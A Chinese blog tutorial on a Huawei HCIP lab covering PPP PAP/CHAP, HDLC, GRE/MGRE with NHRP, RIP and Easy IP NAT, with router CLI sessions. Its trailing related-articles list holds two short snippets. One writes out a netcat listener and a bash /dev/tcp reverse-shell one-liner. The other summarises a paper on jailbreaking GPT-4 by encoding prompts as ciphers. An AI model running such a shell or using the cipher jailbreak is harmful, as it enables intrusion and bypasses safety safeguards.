HCIP【GRE VPN、MGRE VPN与PPP验证综合实验】

目录

实验要求:

实验拓扑图:

实验思路:

实验步骤:

一、配IP地址

(1)配置所有设备接口的IP地址:

(2)配置私网与公网接口的缺省路由使得公网可通:

二、PPP验证的PAP和CHAP认证 与 DHLC 认证

(1)R1和R5间使用PPP的PAP认证,R5为主认证方。

(2)R2与R5之间使用ppp的CHAP认证,R5为主认证方。

(3)R3与R5之间使用HDLC封装。

三、再创建GRE VPN和MGRE VPN

(1)R1、R2、R3构建一个MGRE环境,R1为中心站点。

(2)R1、R4间为点到点的GRE。

(3)在R1到R5上配置路由协议(RIP)传递两端私网路由

四、配置NAT协议(easy IP)使得所有的PC可以访问R5环回


实验要求:

1、R5为ISP,只能进行IP地址配置,其所有地址均配为公有IP地址。

2、(1)R1和R5间使用PPP的PAP认证,R5为主认证方。

   (2)R2与R5之间使用ppp的CHAP认证,R5为主认证方。

   (3)R3与R5之间使用HDLC封装。

3、R1、R2、R3构建一个MGRE环境,R1为中心站点,R1、R4间为点到点的GRE。

4、整个私有网络基于RIP全网可达。

5、所有PC设置私有IP为源IP,可以访问R5环回,实现全网通。

实验拓扑图:

实验思路:

  1. 根据拓扑图配置所有设备的IP地址
  2. 将私网与公网分别搞通
  3. 在公网搞通的基础上进行PPP的pap和chap认证,以及DHLC验证
  4. 再创建GRE VPN和MGRE VPN
  5. 配置NAT协议使得所有的PC可以访问R5环回,实现全网通

实验步骤:

一、配IP地址

(1)配置所有设备接口的IP地址:

PC1:

PC3:

PC6:

PC7:

R1:<Huawei>sys[Huawei]sysn R1[R1]int g 0/0/0[R1-GigabitEthernet0/0/0]ip add 192.168.1.254 24[R1-GigabitEthernet0/0/0]q[R1]int Serial 4/0/0[R1-Serial4/0/0]ip add 15.1.1.1 24[R1-Serial4/0/0]q[R1]dis ip int briR2:<Huawei>sys[Huawei]sysn R2[R2]int g0/0/0[R2-GigabitEthernet0/0/0]ip add 192.168.2.254 24[R2-GigabitEthernet0/0/0]q[R2]int Serial 4/0/0[R2-Serial4/0/0]ip add 25.1.1.2 24[R2-Serial4/0/0]q[R2]dis ip int briR3:<Huawei>sys[Huawei]sysn R3[R3]int g0/0/0[R3-GigabitEthernet0/0/0]ip add 192.168.3.254 24[R3-GigabitEthernet0/0/0]q[R3]int Serial 4/0/0[R3-Serial4/0/0]ip add 35.1.1.3 24[R3-Serial4/0/0]q[R3]dis ip int briR4:<Huawei>sys[Huawei]sysn R4[R4]int g 0/0/0[R4-GigabitEthernet0/0/0]ip add 45.1.1.4 24[R4-GigabitEthernet0/0/0]int g 0/0/1[R4-GigabitEthernet0/0/1]ip add 192.168.4.254 24[R4-GigabitEthernet0/0/1]q[R4]dis ip int briR5:<Huawei>sys[Huawei]sysn R5[R5]int g0/0/0[R5-GigabitEthernet0/0/0]ip add 45.1.1.5 24[R5-GigabitEthernet0/0/0]q[R5]int Serial 4/0/1[R5-Serial4/0/1]ip add 15.1.1.5 24[R5-Serial4/0/1]q[R5]int Serial 3/0/1[R5-Serial3/0/1]ip add 25.1.1.5 24[R5-Serial3/0/1]q[R5]int Serial 4/0/0[R5-Serial4/0/0]ip add 35.1.1.5 24[R5-Serial4/0/0]q[R5]int l0[R5-LoopBack0]ip add 5.5.5.5 24[R5]dis ip int bri

(2)配置私网与公网接口的缺省路由使得公网可通:

R1:[R1]ip route-static 0.0.0.0 0 15.1.1.5R2:[R2]ip route-static 0.0.0.0 0 25.1.1.5R3:[R3]ip route-static 0.0.0.0 0 35.1.1.5R4:[R4]ip route-static 0.0.0.0 0 45.1.1.5

测试一下:

示例:R1的serial 4/0/0接口 ping R2 的serial 4/0/0接口<R1>ping -a 15.1.1.1 25.1.1.2PING 25.1.1.2: 56  data bytes, press CTRL_C to break0.00% packet lossR3的serial 4/0/0接口 ping R4 的g 0/0/0接口<R3>ping -a 35.1.1.3 45.1.1.4PING 45.1.1.4: 56  data bytes, press CTRL_C to break0.00% packet loss

测试通过!!!

二、PPP验证的PAP和CHAP认证 与 DHLC 认证

(1)R1和R5间使用PPP的PAP认证,R5为主认证方。

R5(主验证方):[R5]aaa[R5-aaa]local-user gxc password cipher gxc12345[R5-aaa]local-user gxc service-type ppp[R5-aaa]q[R5]int Serial 4/0/1[R5-Serial4/0/1]ppp authentication-mode pap[R5-Serial4/0/1]q[R5]R1(被验证方):[R1-Serial4/0/0]ppp pap local-user gxc password cipher gxc12345[R1-Serial4/0/0]shutdown[R1-Serial4/0/0]undo shutdown

(2)R2与R5之间使用ppp的CHAP认证,R5为主认证方。

R5(主验证方):[R5-aaa]aaa[R5-aaa]local-user gxc password cipher gxc12345[R5-aaa]local-user gxc service-type ppp[R5-aaa]q[R5]int Serial 3/0/1[R5-Serial3/0/1]ppp authentication-mode chap[R5-Serial3/0/1]q[R5]R2(被验证方):[R2-Serial4/0/0]ppp chap user gxc[R2-Serial4/0/0]ppp chap password cipher gxc12345[R2-Serial4/0/0]undo shutdown[R2-Serial4/0/0]shutdown

(3)R3与R5之间使用HDLC封装。

R5:[R5-Serial4/0/0]link-protocol hdlcR3:[R3-Serial4/0/0]link-protocol hdlc

三、再创建GRE VPN和MGRE VPN

MGRE VPN:10.1.2.0/24

GRE VPN:10.1.1.0/24

(1)R1、R2、R3构建一个MGRE环境,R1为中心站点。

隧道接口配置:
R1:[R1]int Tunnel 0/0/0[R1-Tunnel0/0/0]ip add 10.1.2.1 24[R1-Tunnel0/0/0]tunnel-protocol gre p2mp[R1-Tunnel0/0/0]source 15.1.1.1
# 配置NHRP(下一跳解析协议)[R1-Tunnel0/0/0]nhrp network-id 100[R1-Tunnel0/0/0]q[R1]dis nhrp peer allR2:[R2]int Tunnel 0/0/0[R2-Tunnel0/0/0]ip add 10.1.2.2 24[R2-Tunnel0/0/0]tunnel-protocol gre p2mp[R2-Tunnel0/0/0]source Serial 4/0/0# 设置与NHRP服务器(Next Hop Resolution Protocol)的条目
[R2-Tunnel0/0/0]nhrp network-id 100[R2-Tunnel0/0/0]nhrp entry 10.1.2.1 15.1.1.1 register[R2-Tunnel0/0/0]q[R2]dis nhrp peer allR3:[R3]int Tunnel 0/0/0[R3-Tunnel0/0/0]ip add 10.1.2.3 24[R3-Tunnel0/0/0]tunnel-protocol gre p2mp[R3-Tunnel0/0/0]source Serial 4/0/0.[R3-Tunnel0/0/0]nhrp network-id 100[R3-Tunnel0/0/0]nhrp entry 10.1.2.1 15.1.1.1 register[R3-Tunnel0/0/0]q[R3]dis nhrp peer all

(2)R1、R4间为点到点的GRE。

R1:[R1]int Tunnel 0/0/1[R1-Tunnel0/0/1]ip add 10.1.1.1 24[R1-Tunnel0/0/1]tunnel-protocol gre[R1-Tunnel0/0/1]source 15.1.1.1[R1-Tunnel0/0/1]destination 45.1.1.4R4:[R4]int Tunnel 0/0/1[R4-Tunnel0/0/1]ip add 10.1.1.4 24[R4-Tunnel0/0/1]tunnel-protocol gre[R4-Tunnel0/0/1]source 45.1.1.4[R4-Tunnel0/0/1]destination 15.1.1.1

(3)在R1到R5上配置路由协议(RIP)传递两端私网路由

R1:[R1]rip 1[R1-rip-1]version 2[R1-rip-1]network 192.168.1.0[R1-rip-1]network 10.0.0.0[R1-rip-1]undo summary[R1-rip-1]q查看路由表中的rip信息[R1]dis ip routing-table protocol rip[R1]int Serial 4/0/0关闭RIP水平分割:[R1-Serial4/0/0]undo rip split-horizon[R1]int tunnel 0/0/0开启伪广播 :[R1-Tunnel0/0/0]nhrp entry multicast dynamicR2:[R2]rip 1[R2-rip-1]v 2[R2-rip-1]undo summary[R2-rip-1]network 192.168.2.0[R2-rip-1]network 10.0.0.0[R2-rip-1]q[R2]dis ip routing-table protocol rip[R2]int t0/0/0[R2-Tunnel0/0/0]undo rip split-horizon[R2-Tunnel0/0/0]q[R2]R3:[R3]rip 1[R3-rip-1]v  2[R3-rip-1]undo summary[R3-rip-1]network 192.168.3.0[R3-rip-1]network 10.0.0.0[R3-rip-1]q[R3]dis ip routing-table protocol rip[R3]int t0/0/0[R3-Tunnel0/0/0]undo rip sp[R3-Tunnel0/0/0]undo rip split-horizon[R3-Tunnel0/0/0]q[R3]R4:[R4]rip 1[R4-rip-1]v 2[R4-rip-1]undo summary[R4-rip-1]network 192.168.4.0[R4-rip-1]network 10.0.0.0[R4-rip-1]q[R4]

测试一下私网与公网是否已经是可通:

示例:PC1 ping PC3:PC>ping 192.168.2.3Ping 192.168.2.3: 32 data bytes, Press Ctrl_C to break20.00% packet lossPC1 ping PC6:PC>ping 192.168.3.6Ping 192.168.3.6: 32 data bytes, Press Ctrl_C to break0.00% packet loss

测试通过!!!

四、配置NAT协议(easy IP)使得所有的PC可以访问R5环回

R1:<R1>sys[R1]acl 2000[R1-acl-basic-2000]rule permit source 192.168.1.0 0.0.0.255[R1-acl-basic-2000]q[R1]int Serial 4/0/0[R1-Serial4/0/0]nat outbound 2000[R1-Serial4/0/0]q[R1]R2:[R2]acl 2000[R2-acl-basic-2000]rule permit source 192.168.2.0 0.0.0.255[R2-acl-basic-2000]q[R2]int Serial 4/0/0[R2-Serial4/0/0]nat outbound 2000[R2-Serial4/0/0]q[R2]R3:<R3>sys[R3]acl 2000[R3-acl-basic-2000]rule permit source 192.168.3.0 0.0.0.255[R3-acl-basic-2000]q[R3]int Serial 4/0/0[R3-Serial4/0/0]nat outbound 2000[R3-Serial4/0/0]q[R3]R4:<R4>sys[R4]acl 2000[R4-acl-basic-2000]rule permit source 192.168.4.0 0.0.0.255[R4-acl-basic-2000]q[R4]int g0/0/0[R4-GigabitEthernet0/0/0]nat outbound 2000[R4-GigabitEthernet0/0/0]q[R4]

测试一下:

示例:PC1 ping R5的环回路由:PC>ping 5.5.5.50.00% packet lossPC7 ping R5 的环回路由:PC>ping 5.5.5.5Ping 5.5.5.5: 32 data bytes, Press Ctrl_C to break20.00% packet loss

测试通过!!!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/292993.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

前端面试题---->JavaScript

const声明的对象属性和数组的值可以被修改吗&#xff1f;为什么 原因&#xff1a;当使用const声明一个对象或数组时&#xff0c;实际上是保证了对象或数组的引用不会被修改&#xff0c;但对象或数组本身的属性或元素是可以被修改的。这是因为const只能保证指向的内存地址不变&a…

操作教程|在MeterSphere中通过SSH登录服务器的两种方法

MeterSphere开源持续测试平台拥有非常强大的插件集成机制&#xff0c;用户可以通过插件实现平台能力的拓展&#xff0c;借助插件或脚本实现多种功能。在测试过程中&#xff0c;测试人员有时需要通过SSH协议登录至服务器&#xff0c;以获取某些配置文件和日志文件&#xff0c;或…

ES学习日记(四)-------插件head安装和一些配套插件下载

前言 接上节,第三方插件选择了时间久,功能丰富,长得丑的head,head 插件在ES 5版本以前开箱即用非常简单&#xff0c;ES 5版本以后需要运行在node环境下&#xff0c;所以我们要先准备一下环境 一.安装Git yum -y install git 二.安装node 安装包位置node for linux下载 解压…

CaT论文翻译

CaT: Balanced Continual Graph Learning with Graph Condensation CaT&#xff1a;通过图压缩实现平衡的连续图学习 Abstract 持续图学习(CGL)的目的是通过以流方式输入图数据来持续更新图模型。由于模型在使用新数据进行训练时很容易忘记以前学到的知识&#xff0c;因此灾…

什么是检索增强生成(Retrieval-Augmented Generation,RAG)

什么是RAG&#xff1f; 检索增强生成&#xff08;Retrieval-Augmented Generation&#xff0c;RAG&#xff09;&#xff0c;是指为大模型提供外部知识源的概念。能够让大模型生成准确且符合上下文的答案&#xff0c;同时能够减少模型幻觉。 用最通俗的语言描述&#xff1a;在已…

向量点乘有哪些作用呢

如下&#xff1a; 1.找到两个向量之间的夹角(不用多说) 2.求一个向量投影在另一个向量的投影&#xff1a; 我们把图中b的在a上的投影向量称作b1吧&#xff0c;因为b1就在a上&#xff0c;所以只需要求出b1的大小&#xff0c;然后乘以a的单位向量&#xff0c;我们就得到向量b1了…

Unity 渲染

渲染的三个阶段 1&#xff1a;应用阶段 1.1 数据的准备 遮挡剔除&#xff0c;层级剔除。 渲染顺序&#xff0c;UI在Herachy窗口按照层级渲染&#xff0c;其余物体由大概按照先近后远。 打包渲染数据发送给显存&#xff0c;主要包括有模型信息&#xff0c;变换矩阵&#xff0c…

归并排序---分治法

1、算法的概念 归并排序&#xff1a;是创建在归并操作上的一种有效的排序算法。算法是采用分治法的一个非常典型的应用&#xff0c;且各层分治递归可以同时进行。归并排序的思路简单&#xff0c;速度仅次于快速排序&#xff0c;为稳定排序算法&#xff0c;一般用于对总体无序&…

MoonBit MeetUp回顾——张正、宗喆:编程语言在云原生与区块链领域的技术探索

宗喆和张正分别给我们带了 KCL 相关的最新进展&#xff0c;由蚂蚁集团开发的 Rust 编写的开源 DSL&#xff0c;目标是优化云原生策略配置和用户体验。它通过引入动态配置管理、配置校验和基础设施抽象等核心概念&#xff0c;解决开发者认知负担、配置膨胀和标准化工具缺乏的问题…

[Windows]服务注册工具(nssm)

文章目录 官网下载地址百度云下载地址NSSM常用命令 使用场景&#xff1a;例如现在我们想开启自动启动一个Java服务,nginx,node等。 官网下载地址 https://nssm.cc/download 百度云下载地址 链接&#xff1a;https://pan.baidu.com/s/111fkBWIS7CTlWIj80Kc8Sg?pwdanan 提取码…

python_2

文章目录 题目一运行结果 题目二运行结果 题目一 代码如下&#xff1a; def merge():ls_0 input("输入一个列表(空格隔开)&#xff1a;").split()ls_1 []for i in ls_0:ls_1.append(i)ls_1.sort()if ls_0 ls_1:print("这是一个有序列表")else:print(&qu…

[Android]模拟器登录Google Play失败

问题&#xff1a; 模拟器登录Google Play失败&#xff0c;提示couldnt sign in there was a problem communicating with google servers. try again later. 原因&#xff1a; 原因是模拟器没有连接到互联网&#xff0c;打开模拟器中Google浏览器进行搜索一样不行。 解决&am…

数据结构--循环链表(C语言实现)

一.循环链表的设计 typedef struct CNode{ int data; struct CNode* next; }CNode ,*CList; 2.循环链表的示意图: 3.循环链表和单链表的区别: 唯一区别,没有空指针,尾节点的后继为头,为循环之意. 二.循环链表的实现 //初始化return true; }//返回key的前驱地址&#xff0c;如果…

蓝桥杯省赛刷题——题目 2656:刷题统计

刷题统计OJ链接&#xff1a;蓝桥杯2022年第十三届省赛真题-刷题统计 - C语言网 (dotcpp.com) 题目描述 小明决定从下周一开始努力刷题准备蓝桥杯竞赛。他计划周一至周五每天做 a 道题目&#xff0c;周六和周日每天做 b 道题目。请你帮小明计算&#xff0c;按照计划他将在第几…

反弹shell

kali监听&#xff1a; nc -lvp port 客户机执行&#xff1a; bash -i >& /dev/tcp/ip/port 0>&1 bash -c "bash -i >& /dev/tcp/ip/port 0>&1" bash -c&#xff1a;告诉 Bash 执行 -c 后面跟随的命令字符串。bash -i&#xff1a;启动一…

抽象类和接口的简单认识

目录 一、抽象类 1.什么是抽象类 2.抽象类的注意事项 3.抽象类与普通类的对比 二、接口 1.接口的简单使用 2.接口的特性 3.接口的使用案例 4.接口和抽象类的异同 一、抽象类 所谓抽象类&#xff0c;就是更加抽象的类&#xff0c;也就是说&#xff0c;这个类不能具体描…

动态规划之子序列(三)

583. 两个字符串的删除操作 给定两个单词 word1 和 word2&#xff0c;找到使得 word1 和 word2 相同所需的最小步数&#xff0c;每步可以删除任意一个字符串中的一个字符。 示例&#xff1a; 输入: “sea”, “eat” 输出: 2 解释: 第一步将"sea"变为"ea"…

论文笔记:GPT-4 Is Too Smart To Be Safe: Stealthy Chat with LLMs via Cipher

ICLR 2024 reviewer评分 5688 1 论文思路 输入转换为密码&#xff0c;同时附上提示&#xff0c;将加密输入喂给LLMLLM输出加密的输出加密的输出通过解密器解密 ——>这样的步骤成功地绕过了GPT-4的安全对齐【可以回答一些反人类的问题&#xff0c;这些问题如果明文问的话&…

Linux 安装Mysql

安装源文件版本&#xff1a;mysql-5.7.25-linux-glibc2.12-x86_64.tar.gz 安装前&#xff0c;我们可以检测系统是否自带安装 MySQL: rpm -qa | grep mysql如有&#xff0c;类似 mysql-libs-5.1.52-1.el6_0.1.x86_64那可以选择进行卸载: rpm -e mysql-libs-5.1.52-1.el6_0.1…

云备份项目认识、环境搭建以及所使用的库的介绍

一、云备份认识 将本地计算机一个受监管的文件夹的文件上传到服务器中&#xff0c;有服务器组织&#xff0c;客户端可以通过网页将文件查看并且下载下来&#xff0c;下载过程支持断点续传功能&#xff0c;并且服务器会对上传的文件进行热点管理&#xff0c;长时间没人访问的文…